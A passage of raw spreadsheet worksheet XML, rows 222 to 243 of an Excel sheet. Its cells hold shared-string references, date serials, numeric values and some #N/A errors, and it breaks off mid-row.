      <c r="P222" s="1"/>
      <c r="Q222" s="1" t="s">
        <v>3575</v>
      </c>
      <c r="R222" s="83">
        <v>40741</v>
      </c>
      <c r="S222" s="83">
        <v>30502</v>
      </c>
      <c r="T222" s="83">
        <v>34254</v>
      </c>
      <c r="U222" s="83">
        <v>68134</v>
      </c>
      <c r="V222" s="83">
        <v>112684</v>
      </c>
      <c r="W222" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="223" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A223" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B223" s="51">
        <v>44223.845142488426</v>
      </c>
      <c r="C223" s="1" t="s">
        <v>2355</v>
      </c>
      <c r="D223" s="43">
        <v>223</v>
      </c>
      <c r="E223" s="1" t="s">
        <v>2383</v>
      </c>
      <c r="F223" s="43">
        <v>105</v>
      </c>
      <c r="G223" s="1" t="s">
        <v>2384</v>
      </c>
      <c r="H223" s="1" t="s">
        <v>2385</v>
      </c>
      <c r="I223" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J223" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K223" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L223" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M223" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N223" s="1"/>
      <c r="O223" s="1" t="s">
        <v>2370</v>
      </c>
      <c r="P223" s="1" t="s">
        <v>181</v>
      </c>
      <c r="Q223" s="1" t="s">
        <v>3574</v>
      </c>
      <c r="R223" s="83">
        <v>919</v>
      </c>
      <c r="S223" s="83">
        <v>286</v>
      </c>
      <c r="T223" s="83">
        <v>793</v>
      </c>
      <c r="U223" s="83">
        <v>9721</v>
      </c>
      <c r="V223" s="83">
        <v>48911</v>
      </c>
      <c r="W223" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="224" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A224" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B224" s="51">
        <v>44033.617680532407</v>
      </c>
      <c r="C224" s="1" t="s">
        <v>1489</v>
      </c>
      <c r="D224" s="43">
        <v>110</v>
      </c>
      <c r="E224" s="1" t="s">
        <v>2386</v>
      </c>
      <c r="F224" s="26">
        <v>100</v>
      </c>
      <c r="G224" s="1" t="s">
        <v>2387</v>
      </c>
      <c r="H224" s="1" t="s">
        <v>2388</v>
      </c>
      <c r="I224" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J224" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K224" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L224" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M224" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N224" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O224" s="1"/>
      <c r="P224" s="1"/>
      <c r="Q224" s="1" t="s">
        <v>1493</v>
      </c>
      <c r="R224" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S224" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T224" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U224" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V224" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W224" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="225" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A225" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B225" s="51">
        <v>44292.098849618058</v>
      </c>
      <c r="C225" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="D225" s="43">
        <v>105</v>
      </c>
      <c r="E225" s="1" t="s">
        <v>2392</v>
      </c>
      <c r="F225" s="26">
        <v>105</v>
      </c>
      <c r="G225" s="1" t="s">
        <v>2393</v>
      </c>
      <c r="H225" s="1" t="s">
        <v>2395</v>
      </c>
      <c r="I225" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J225" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K225" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L225" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M225" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N225" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O225" s="1"/>
      <c r="P225" s="1"/>
      <c r="Q225" s="1" t="s">
        <v>3562</v>
      </c>
      <c r="R225" s="83">
        <v>2561</v>
      </c>
      <c r="S225" s="83">
        <v>2807</v>
      </c>
      <c r="T225" s="83">
        <v>2490</v>
      </c>
      <c r="U225" s="83">
        <v>2504</v>
      </c>
      <c r="V225" s="83">
        <v>2944</v>
      </c>
      <c r="W225" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="226" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A226" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B226" s="51">
        <v>44266.705436481483</v>
      </c>
      <c r="C226" s="1" t="s">
        <v>2396</v>
      </c>
      <c r="D226" s="43">
        <v>133</v>
      </c>
      <c r="E226" s="1" t="s">
        <v>2397</v>
      </c>
      <c r="F226" s="43">
        <v>113</v>
      </c>
      <c r="G226" s="1" t="s">
        <v>2398</v>
      </c>
      <c r="H226" s="1" t="s">
        <v>2399</v>
      </c>
      <c r="I226" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J226" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K226" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L226" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M226" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N226" s="1"/>
      <c r="O226" s="1"/>
      <c r="P226" s="1"/>
      <c r="Q226" s="1" t="s">
        <v>3576</v>
      </c>
      <c r="R226" s="83">
        <v>390710</v>
      </c>
      <c r="S226" s="83">
        <v>399448</v>
      </c>
      <c r="T226" s="83">
        <v>330422</v>
      </c>
      <c r="U226" s="83">
        <v>413011</v>
      </c>
      <c r="V226" s="83">
        <v>370392</v>
      </c>
      <c r="W226" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="227" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A227" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B227" s="51">
        <v>44266.705436516204</v>
      </c>
      <c r="C227" s="1" t="s">
        <v>2396</v>
      </c>
      <c r="D227" s="43">
        <v>133</v>
      </c>
      <c r="E227" s="1" t="s">
        <v>2401</v>
      </c>
      <c r="F227" s="26">
        <v>110</v>
      </c>
      <c r="G227" s="1" t="s">
        <v>2402</v>
      </c>
      <c r="H227" s="1" t="s">
        <v>2403</v>
      </c>
      <c r="I227" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J227" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K227" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L227" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M227" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N227" s="1"/>
      <c r="O227" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P227" s="1"/>
      <c r="Q227" s="1" t="s">
        <v>3576</v>
      </c>
      <c r="R227" s="83">
        <v>164</v>
      </c>
      <c r="S227" s="83">
        <v>215</v>
      </c>
      <c r="T227" s="83">
        <v>120</v>
      </c>
      <c r="U227" s="83">
        <v>172</v>
      </c>
      <c r="V227" s="83">
        <v>195</v>
      </c>
      <c r="W227" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="228" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A228" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B228" s="51">
        <v>44266.705436493059</v>
      </c>
      <c r="C228" s="1" t="s">
        <v>2396</v>
      </c>
      <c r="D228" s="43">
        <v>133</v>
      </c>
      <c r="E228" s="1" t="s">
        <v>2404</v>
      </c>
      <c r="F228" s="26">
        <v>110</v>
      </c>
      <c r="G228" s="1" t="s">
        <v>2405</v>
      </c>
      <c r="H228" s="1" t="s">
        <v>2406</v>
      </c>
      <c r="I228" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J228" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K228" s="49" t="s">
        <v>17</v>
      </c>
      <c r="L228" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M228" s="49" t="s">
        <v>72</v>
      </c>
      <c r="N228" s="1"/>
      <c r="O228" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P228" s="1"/>
      <c r="Q228" s="1" t="s">
        <v>3576</v>
      </c>
      <c r="R228" s="83">
        <v>652</v>
      </c>
      <c r="S228" s="83">
        <v>861</v>
      </c>
      <c r="T228" s="83">
        <v>480</v>
      </c>
      <c r="U228" s="83">
        <v>676</v>
      </c>
      <c r="V228" s="83">
        <v>765</v>
      </c>
      <c r="W228" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="229" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A229" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B229" s="51">
        <v>44055.660416840277</v>
      </c>
      <c r="C229" s="1" t="s">
        <v>2407</v>
      </c>
      <c r="D229" s="43">
        <v>100</v>
      </c>
      <c r="E229" s="1" t="s">
        <v>2408</v>
      </c>
      <c r="F229" s="26">
        <v>100</v>
      </c>
      <c r="G229" s="1" t="s">
        <v>2409</v>
      </c>
      <c r="H229" s="1" t="s">
        <v>2410</v>
      </c>
      <c r="I229" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J229" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K229" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L229" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M229" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N229" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O229" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P229" s="1"/>
      <c r="Q229" s="1" t="s">
        <v>3577</v>
      </c>
      <c r="R229" s="83">
        <v>1833275</v>
      </c>
      <c r="S229" s="83">
        <v>1434873</v>
      </c>
      <c r="T229" s="83">
        <v>1173941</v>
      </c>
      <c r="U229" s="83">
        <v>1477751</v>
      </c>
      <c r="V229" s="83">
        <v>2297368</v>
      </c>
      <c r="W229" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="230" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A230" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B230" s="51">
        <v>44707.725042025464</v>
      </c>
      <c r="C230" s="1" t="s">
        <v>2412</v>
      </c>
      <c r="D230" s="26">
        <v>100</v>
      </c>
      <c r="E230" s="1" t="s">
        <v>2413</v>
      </c>
      <c r="F230" s="26">
        <v>100</v>
      </c>
      <c r="G230" s="57" t="s">
        <v>2414</v>
      </c>
      <c r="H230" s="1" t="s">
        <v>2415</v>
      </c>
      <c r="I230" s="1"/>
      <c r="J230" s="1"/>
      <c r="K230" s="1"/>
      <c r="L230" s="1"/>
      <c r="M230" s="1"/>
      <c r="N230" s="1"/>
      <c r="O230" s="1"/>
      <c r="P230" s="1"/>
      <c r="Q230" s="1" t="s">
        <v>3507</v>
      </c>
      <c r="R230" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S230" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T230" s="83">
        <v>2</v>
      </c>
      <c r="U230" s="83">
        <v>1</v>
      </c>
      <c r="V230" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W230" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="231" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A231" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B231" s="51">
        <v>44503.926326932873</v>
      </c>
      <c r="C231" s="1" t="s">
        <v>2425</v>
      </c>
      <c r="D231" s="43">
        <v>212</v>
      </c>
      <c r="E231" s="1" t="s">
        <v>2426</v>
      </c>
      <c r="F231" s="26">
        <v>302</v>
      </c>
      <c r="G231" s="1" t="s">
        <v>2427</v>
      </c>
      <c r="H231" s="1" t="s">
        <v>2428</v>
      </c>
      <c r="I231" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J231" s="1" t="s">
        <v>1006</v>
      </c>
      <c r="K231" s="17" t="s">
        <v>23</v>
      </c>
      <c r="L231" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M231" s="1" t="s">
        <v>1006</v>
      </c>
      <c r="N231" s="1" t="s">
        <v>1007</v>
      </c>
      <c r="O231" s="1" t="s">
        <v>2429</v>
      </c>
      <c r="P231" s="1"/>
      <c r="Q231" s="1" t="s">
        <v>3578</v>
      </c>
      <c r="R231" s="83">
        <v>9816</v>
      </c>
      <c r="S231" s="83">
        <v>7608</v>
      </c>
      <c r="T231" s="83">
        <v>7674</v>
      </c>
      <c r="U231" s="83">
        <v>7380</v>
      </c>
      <c r="V231" s="83">
        <v>8297</v>
      </c>
      <c r="W231" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="232" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A232" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B232" s="51">
        <v>44603.965466319445</v>
      </c>
      <c r="C232" s="1" t="s">
        <v>2431</v>
      </c>
      <c r="D232" s="43">
        <v>110</v>
      </c>
      <c r="E232" s="1" t="s">
        <v>2432</v>
      </c>
      <c r="F232" s="26">
        <v>110</v>
      </c>
      <c r="G232" s="1" t="s">
        <v>2433</v>
      </c>
      <c r="H232" s="1" t="s">
        <v>2434</v>
      </c>
      <c r="I232" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J232" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K232" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L232" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M232" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N232" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O232" s="1"/>
      <c r="P232" s="1"/>
      <c r="Q232" s="1" t="s">
        <v>3579</v>
      </c>
      <c r="R232" s="83">
        <v>1688</v>
      </c>
      <c r="S232" s="83">
        <v>3427</v>
      </c>
      <c r="T232" s="83">
        <v>7298</v>
      </c>
      <c r="U232" s="83">
        <v>12173</v>
      </c>
      <c r="V232" s="83">
        <v>16341</v>
      </c>
      <c r="W232" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="233" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A233" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B233" s="51">
        <v>44662.396883715279</v>
      </c>
      <c r="C233" s="1" t="s">
        <v>2436</v>
      </c>
      <c r="D233" s="26">
        <v>100</v>
      </c>
      <c r="E233" s="1" t="s">
        <v>2437</v>
      </c>
      <c r="F233" s="26">
        <v>100</v>
      </c>
      <c r="G233" s="57" t="s">
        <v>2438</v>
      </c>
      <c r="H233" s="1" t="s">
        <v>2439</v>
      </c>
      <c r="I233" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J233" s="1" t="s">
        <v>1006</v>
      </c>
      <c r="K233" s="1" t="s">
        <v>23</v>
      </c>
      <c r="L233" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M233" s="1" t="s">
        <v>1006</v>
      </c>
      <c r="N233" s="1" t="s">
        <v>1007</v>
      </c>
      <c r="O233" s="1"/>
      <c r="P233" s="1"/>
      <c r="Q233" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R233" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S233" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T233" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U233" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V233" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W233" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="234" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A234" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B234" s="51">
        <v>44047.731314027777</v>
      </c>
      <c r="C234" s="1" t="s">
        <v>2580</v>
      </c>
      <c r="D234" s="43">
        <v>100</v>
      </c>
      <c r="E234" s="1" t="s">
        <v>2581</v>
      </c>
      <c r="F234" s="26">
        <v>100</v>
      </c>
      <c r="G234" s="1" t="s">
        <v>2582</v>
      </c>
      <c r="H234" s="1" t="s">
        <v>2583</v>
      </c>
      <c r="I234" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J234" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K234" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L234" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M234" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N234" s="1"/>
      <c r="O234" s="1" t="s">
        <v>2584</v>
      </c>
      <c r="P234" s="1"/>
      <c r="Q234" s="1" t="s">
        <v>3580</v>
      </c>
      <c r="R234" s="83">
        <v>488622</v>
      </c>
      <c r="S234" s="83">
        <v>553729</v>
      </c>
      <c r="T234" s="83">
        <v>488258</v>
      </c>
      <c r="U234" s="83">
        <v>532334</v>
      </c>
      <c r="V234" s="83">
        <v>594858</v>
      </c>
      <c r="W234" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="235" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A235" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B235" s="51">
        <v>44047.731314027777</v>
      </c>
      <c r="C235" s="1" t="s">
        <v>2580</v>
      </c>
      <c r="D235" s="43">
        <v>300</v>
      </c>
      <c r="E235" s="1" t="s">
        <v>2581</v>
      </c>
      <c r="F235" s="26">
        <v>100</v>
      </c>
      <c r="G235" s="1" t="s">
        <v>2586</v>
      </c>
      <c r="H235" s="1" t="s">
        <v>2583</v>
      </c>
      <c r="I235" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J235" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K235" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L235" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M235" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N235" s="1"/>
      <c r="O235" s="1" t="s">
        <v>2584</v>
      </c>
      <c r="P235" s="1"/>
      <c r="Q235" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R235" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S235" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T235" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U235" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V235" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W235" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="236" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A236" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B236" s="51">
        <v>44047.731314004632</v>
      </c>
      <c r="C236" s="1" t="s">
        <v>2580</v>
      </c>
      <c r="D236" s="43">
        <v>100</v>
      </c>
      <c r="E236" s="1" t="s">
        <v>2587</v>
      </c>
      <c r="F236" s="26">
        <v>100</v>
      </c>
      <c r="G236" s="1" t="s">
        <v>2588</v>
      </c>
      <c r="H236" s="1" t="s">
        <v>2589</v>
      </c>
      <c r="I236" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J236" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K236" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L236" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M236" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N236" s="1"/>
      <c r="O236" s="1" t="s">
        <v>2590</v>
      </c>
      <c r="P236" s="1"/>
      <c r="Q236" s="1" t="s">
        <v>3580</v>
      </c>
      <c r="R236" s="83">
        <v>864184</v>
      </c>
      <c r="S236" s="83">
        <v>810462</v>
      </c>
      <c r="T236" s="83">
        <v>758411</v>
      </c>
      <c r="U236" s="83">
        <v>719610</v>
      </c>
      <c r="V236" s="83">
        <v>800650</v>
      </c>
      <c r="W236" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="237" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A237" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B237" s="51">
        <v>44047.731314004632</v>
      </c>
      <c r="C237" s="1" t="s">
        <v>2580</v>
      </c>
      <c r="D237" s="26">
        <v>300</v>
      </c>
      <c r="E237" s="1" t="s">
        <v>2587</v>
      </c>
      <c r="F237" s="26">
        <v>100</v>
      </c>
      <c r="G237" s="26"/>
      <c r="H237" s="1" t="s">
        <v>2589</v>
      </c>
      <c r="I237" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J237" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K237" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L237" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M237" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N237" s="1"/>
      <c r="O237" s="1" t="s">
        <v>2590</v>
      </c>
      <c r="P237" s="1"/>
      <c r="Q237" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R237" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S237" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T237" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U237" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V237" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W237" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="238" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A238" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B238" s="51">
        <v>44047.731314039353</v>
      </c>
      <c r="C238" s="1" t="s">
        <v>2580</v>
      </c>
      <c r="D238" s="26">
        <v>100</v>
      </c>
      <c r="E238" s="1" t="s">
        <v>2591</v>
      </c>
      <c r="F238" s="26">
        <v>100</v>
      </c>
      <c r="G238" s="26"/>
      <c r="H238" s="1" t="s">
        <v>2592</v>
      </c>
      <c r="I238" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J238" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K238" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L238" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M238" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N238" s="1"/>
      <c r="O238" s="1" t="s">
        <v>2593</v>
      </c>
      <c r="P238" s="1"/>
      <c r="Q238" s="1" t="s">
        <v>3580</v>
      </c>
      <c r="R238" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S238" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T238" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U238" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V238" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W238" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="239" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A239" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B239" s="51">
        <v>44047.731314039353</v>
      </c>
      <c r="C239" s="1" t="s">
        <v>2580</v>
      </c>
      <c r="D239" s="26">
        <v>300</v>
      </c>
      <c r="E239" s="1" t="s">
        <v>2591</v>
      </c>
      <c r="F239" s="26">
        <v>100</v>
      </c>
      <c r="G239" s="26"/>
      <c r="H239" s="1" t="s">
        <v>2592</v>
      </c>
      <c r="I239" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J239" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K239" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L239" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M239" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N239" s="1"/>
      <c r="O239" s="1" t="s">
        <v>2593</v>
      </c>
      <c r="P239" s="1"/>
      <c r="Q239" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R239" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S239" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T239" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U239" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V239" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W239" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="240" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A240" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B240" s="51">
        <v>44047.489031041667</v>
      </c>
      <c r="C240" s="1" t="s">
        <v>2609</v>
      </c>
      <c r="D240" s="43">
        <v>100</v>
      </c>
      <c r="E240" s="1" t="s">
        <v>2610</v>
      </c>
      <c r="F240" s="26">
        <v>100</v>
      </c>
      <c r="G240" s="1" t="s">
        <v>2611</v>
      </c>
      <c r="H240" s="1" t="s">
        <v>2612</v>
      </c>
      <c r="I240" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J240" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K240" s="17" t="s">
        <v>575</v>
      </c>
      <c r="L240" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M240" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N240" s="1"/>
      <c r="O240" s="1" t="s">
        <v>2613</v>
      </c>
      <c r="P240" s="1"/>
      <c r="Q240" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R240" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S240" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T240" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U240" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V240" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W240" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="241" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A241" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B241" s="51">
        <v>44524.833629583336</v>
      </c>
      <c r="C241" s="1" t="s">
        <v>2619</v>
      </c>
      <c r="D241" s="43">
        <v>105</v>
      </c>
      <c r="E241" s="1" t="s">
        <v>2620</v>
      </c>
      <c r="F241" s="26">
        <v>115</v>
      </c>
      <c r="G241" s="1" t="s">
        <v>2621</v>
      </c>
      <c r="H241" s="1" t="s">
        <v>2622</v>
      </c>
      <c r="I241" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J241" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K241" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L241" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M241" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N241" s="1"/>
      <c r="O241" s="1"/>
      <c r="P241" s="1"/>
      <c r="Q241" s="1" t="s">
        <v>3581</v>
      </c>
      <c r="R241" s="83">
        <v>566667</v>
      </c>
      <c r="S241" s="83">
        <v>392688</v>
      </c>
      <c r="T241" s="83">
        <v>615224</v>
      </c>
      <c r="U241" s="83">
        <v>536617</v>
      </c>
      <c r="V241" s="83">
        <v>483216</v>
      </c>
      <c r="W241" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="242" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A242" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B242" s="51">
        <v>44467.868079178239</v>
      </c>
      <c r="C242" s="1" t="s">
        <v>2624</v>
      </c>
      <c r="D242" s="43">
        <v>101</v>
      </c>
      <c r="E242" s="1" t="s">
        <v>2625</v>
      </c>
      <c r="F242" s="26">
        <v>101</v>
      </c>
      <c r="G242" s="1" t="s">
        <v>2626</v>
      </c>
      <c r="H242" s="1" t="s">
        <v>2627</v>
      </c>
      <c r="I242" s="1" t="s">
        <v>833</v>
      </c>
      <c r="J242" s="1" t="s">
        <v>25</v>
      </c>
      <c r="K242" s="1" t="s">
        <v>25</v>
      </c>
      <c r="L242" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M242" s="1" t="s">
        <v>25</v>
      </c>
      <c r="N242" s="1" t="s">
        <v>835</v>
      </c>
      <c r="O242" s="1"/>
      <c r="P242" s="1"/>
      <c r="Q242" s="1" t="s">
        <v>3582</v>
      </c>
      <c r="R242" s="83">
        <v>17102</v>
      </c>
      <c r="S242" s="83">
        <v>12956</v>
      </c>
      <c r="T242" s="83">
        <v>11486</v>
      </c>
      <c r="U242" s="83">
        <v>12777</v>
      </c>
      <c r="V242" s="83">
        <v>14614</v>
      </c>
      <c r="W242" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="243" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A243" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B243" s="51">
        <v>44145.686774780093</v>
      </c>
      <c r="C243" s="1" t="s">
        <v>2653</v>
      </c>
      <c r="D243" s="43">
        <v>100</v>
      </c>
      <c r="E243" s="1" t="s">
        <v>2654</v>
      </c>
      <c r="F243" s="26">
        <v>100</v>
      </c>
      <c r="G243" s="1" t="s">
        <v>2655</v>
      </c>
      <c r="H243" s="1" t="s">
        <v>2656</v>
      </c>
      <c r="I243" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J243" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K243" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L243" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M243" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N243" s="1"/>
      <c r="O243" s="1" t="s">
        <v>2657</v>
      </c>
      <c r="P243" s="1"/>
      <c r="Q243" s="1" t="s">
        <v>3583</v>
      </c>
      <c r="R243" s="83">
        <v>10360</v>
      </c>
      <c r="S243" s="83">
        <v>19388</v>
      </c>
      <c r="T243" s="83">
        <v>35277</v>
      </c>
      <c r="U243" s="83">
        <v>27024</v>
      </c>
      <c r="V243" s="83">
